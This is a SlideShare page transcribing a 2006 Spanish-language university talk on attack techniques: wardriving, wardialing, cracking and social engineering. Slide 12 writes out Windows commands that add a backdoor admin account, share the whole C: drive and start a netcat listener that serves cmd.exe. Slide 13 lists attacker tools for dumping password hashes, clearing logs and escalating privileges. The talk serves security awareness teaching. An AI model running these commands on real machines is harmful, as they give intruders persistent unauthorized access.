Your SlideShare is downloading. ×
  • Like
Estrategias de Ataque y Defensa
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×

Now you can save presentations on your phone or tablet

Available for both IPhone and Android

Text the download link to your phone

Standard text messaging rates apply

Estrategias de Ataque y Defensa

  • 3,274 views
Published

Estrategias de Ataque y Defensa dirigido por el Ingeniero Siler Amador de la Unidad de Seguridad Informatica del la Universidad del Cauca.

Estrategias de Ataque y Defensa dirigido por el Ingeniero Siler Amador de la Unidad de Seguridad Informatica del la Universidad del Cauca.

Published in Technology
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Be the first to comment
No Downloads

Views

Total Views
3,274
On SlideShare
0
From Embeds
0
Number of Embeds
3

Actions

Shares
Downloads
106
Comments
0
Likes
2

Embeds 0

No embeds

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
    No notes for slide

Transcript

  • 1. ESTRATEGIAS DE ATAQUE EN SEGURIDAD INFORMATICA Grupo de I+D en Tecnologías de la Información (GTI) (Esp) Siler Amador Donado samador@unicauca.edu.co http://gseguridad.unicauca.edu.co
  • 2. AGENDA Hackers vs Crackers El riesgo en la seguridad informática Pérdidas económicas por ataques informáticos Técnicas de ataque Vectores de ataque a una red Y si tienen la oportunidad… Caja de herramientas de ataque La próxima generación de Troyanos Keylogers Demo 1 (Ataque Masivo) Demo 2 (Defaced) … Y en la Unicauca que? Conclusiones
  • 3. HACKERS VS CRACKERS As Eg es oís or an ta s Delinc uente s Eti ca Hackers Crackers en n uy u ye ns tr str Co De
  • 4. EL RIESGO EN LA SEGURIDAD INFORMÁTICA
  • 5. PÉRDIDAS POR ATAQUES CCS/FBI 2005
  • 6. PÉRDIDAS POR ATAQUES CCS/FBI 2005 $67.2 billones por año $7.6 millones por hora
  • 7. TECNICAS DE ATAQUE Wardriving: Nombre que recibe la búsqueda de redes inalámbricas para documentar su posición. Para realizar esta búsqueda se necesita como mínimo un equipo móvil (portátil) con tarjeta Wireless, y si queremos que la posición sea precisa, un GPS para pasar los datos a un mapa. Objetivo: Conectarse al punto de acceso (AP) mal configurado e ingresar a la la red local de la empresa. Herramientas: NetStumbler Kismet http://www.wardrive.net/wardriving/tools
  • 8. TECNICAS DE ATAQUE Wardialing: Fue una técnica de los 80´s y 90´s, consitía en marcar repetidamente a modems y PBX´s disponibles en la red y de esta forma irrumpir a sistemas remotos. Objetivo: Conectarse a modems o PBX´s mal configurados e ingresar a la la red local de la empresa. Herramientas: THC-Scan 2.0 ModemScan ShokDial
  • 9. TECNICAS DE ATAQUE Cracking: Modificar un programa para obtener beneficios. Normalmente se basa en quitar pantallas introductorias, protecciones o, como en unas modificaciones de cierto programa de comunicaciones, conseguir nuevos passwords de acceso a sistemas. Objetivo: Tener acceso al software o a la red interna. Herramientas: Las 100 mejores http://sectools.org/ Inyección SQL XSS
  • 10. TECNICAS DE ATAQUE Ing. Social: Persuadir a otra persona (a través de diversas formas) para que nos de un dato útil para cumplir un objetivo. Este dato puede ser un password, un código, etc. incluso pueden dar nombres de familiares y fechas importantes, que siempre se usan para formar claves. Objetivo: Obtener información sensible que nos permita el acceso a la red. Herramientas: Teléfono Mucha psicología Inteligencia emocional http://www.laflecha.net/perfiles/tecnologia/kevin_mitnick/
  • 11. VECTORES DE ATAQUE A UNA RED Puntos de acceso Wardriving WIRELESS Wardialing Wardialing INTERNET Cracking MODEM MODEM RED FISICO Ing. Social
  • 12. Y si tienen la oportunidad… Menos de 1 minuto es suficiente para: 1. Crear una cuenta con privilegios de Admin!!! 1. Abrir la consola de comandos 2. C:net user cracker siti2006 /add 3. C:net localgroup administradores cracker /add 2. Compartir toda la unidad del disco!!! 1. C:net share siti2006=c: /remark:”Demo SITI2006” 3. Colocar un programa en escucha!!! 1. http://gseguridad.unicauca.edu.co/nc.exe 2. C:WINNTSystem32nc.exe -d -L -p 55555 -e cmd.exe
  • 13. Caja de Herramientas de ataque en línea de comandos fport.exe - shows open ports and the process that owns the port iplist.exe - enumerates the ip's of the computer md5.exe - gets the md5 hash of a file pw2kget.exe - for win2k gets the password of the currently logged on user pwreveal.exe - gets the passwords of any window that has a ****** editbox regshell.exe - a commandline registry explorer/editor sendmail.exe - a commandline email sender uptime.exe - gets the machines current uptime xwhois - advanced whois lookup Screencap.exe - makes a screenshot of the screen and saves it to screenshot.bmp CMDget.exe - Downloads a file from a website from user provided parameters webscr.exe - creates a snapshot from the webcam and saves it shutd.exe - program that forces shutdown/reboot of machine bnc.exe - bnc for windows (see bnc.cfg) clslog.exe - clears app/security/system logs XP/NT/2k enum.exe - enumerates IPC$ share to collect information winfo.exe - enumerates IPC$ share to collect information FTPd.exe - small ftp server for dos (see slimftpd.conf) Global.exe - process dos command on all disc/subdirs iislog.exe - clears IIS logs Info.exe - gets system information ispc.exe - spawns shell on hacked IIS (put idq.dll on remote script dir) nc.exe - netcat pv.exe - process manager for dos Pwdump.exe - dumps SAM hashes scrnmode.exe - change screen mode from dos unrar.exe - unrar for dos wget.exe - wget for windows wizmo.exe - command tool (see w.txt) dwpp.exe - dial up password graber winrelay.exe - relay tcp/udp connections getad.exe - escalate to admin user in w2k pipeup.exe - escalate to admin user in w2k dnsid - identify remore dns server Agradecimientos a: Netranger Tomado de: http://www.governmentsecurity.org/forum/lofiversion/index.php/t2824.html
  • 14. LA PRÓXIMA GENERACION DE TROYANOS KEYLOGERS… http://www.hispasec.com/laboratorio/troyano_video.htm
  • 15. DEMO1 - ATAQUE MASIVO Escenario ZOMBIES ATACANTE MAESTRO Windows Linux Metasploit Win/XP/2K Scripts en Python SITI 2006 LAN http://www.microsoft.com/spain/technet/seguridad/boletines/ms05-039-it.mspx
  • 16. DEMO2 - DEFACED http://www.zone-h.com VIDEO RUSO
  • 17. ... Y en la Unicauca que? Preocupación del departamento de sistemas de la FIET sobre la problemática de la seguridad de la información. • Electiva de seguridad informática • Área de interés en seguridad informática del GTI. (Proyectos de tesis de grado) • Legislación en comercio electrónico (Finalizado) • OBSES (Firewall Cluster Beowulf) (Finalizado) • INFORCE (Finalizado) • Antivirus-inteligente (En desarrollo) • Estudio de las tendencias predictivas sobre la escogencia de contraseñas basado en redes bayesianas (En desarrollo) • Proyecto de Auditoría informática UNICAUCA • Publicaciones
  • 18. CONCLUSIONES Los ataques de seguridad informática a nivel mundial son aislados? Inversión en guerra informática? ECHELON, ENFOPOL, CARNÍVORO… • USA • UK • CHINA • RUSIA Los sistemas de seguridad actuales son reactivos y correctivos. • Preventivos • Inteligentes Existen demasiadas herramientas de ataque gratis y disponibles en la red. Las técnicas de ataque cabian constantemente. Segun las estadísticas es muy probable que su sistema haya sido vulnerado y usted aún no lo sepa!!!.